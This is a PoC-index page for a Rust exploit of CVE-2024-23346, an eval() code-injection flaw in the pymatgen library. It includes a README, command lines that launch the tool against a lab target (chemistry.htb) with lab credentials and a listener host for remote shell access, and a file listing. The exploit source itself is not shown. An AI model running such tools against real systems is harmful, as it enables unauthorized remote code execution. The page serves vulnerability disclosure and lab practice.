CVE-2024-23346 PoC — Pymatgen 安全漏洞

Source

https://github.com/szyth/CVE-2024-23346-rust-exploit

Associated Vulnerability

Title:Pymatgen 安全漏洞 (CVE-2024-23346)
Description:pymatgen是一个用于材料分析的开源 Python 库。 Pymatgen 2024.2.20之前版本存在安全漏洞，该漏洞源于不安全地利用eval()函数来处理输入，从而在解析不受信任的输入时能够执行任意代码。

Description

A Rust exploit for CVE-2024-23346 that functions as a "terminal" (tested on chemistry.htb)

Readme

A Rust exploitation script for CVE-2024-23346.

As shown below the POC uses the code injection vulnerability and runs remote shell commands like in a Terminal.


[poc.webm](https://github.com/user-attachments/assets/0d1e15d8-21c3-4c32-9ae2-8539461ca257)

---
Steps to run the exploit:
- Run directly with `Cargo`
    - `cargo run -- --help`
    - `cargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19`

OR

- Compile the Binary: `cargo build -r` (binary will be in `target/release/poc`)
- Run the Binary:
    - `./poc --help`
    - `./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19`


---
Exploit script is inspired from Python Scripting Expert [MAWK0235](https://github.com/MAWK0235)

File Snapshot


 [4.0K]  /data/pocs/5a760343e248f15aa3bb86e391662b9f58529977
├── [ 47K]  Cargo.lock
├── [ 324]  Cargo.toml
├── [4.0K]  file
│   └── [ 622]  poc.cif
├── [ 782]  README.md
└── [4.0K]  src
    └── [7.9K]  main.rs

2 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!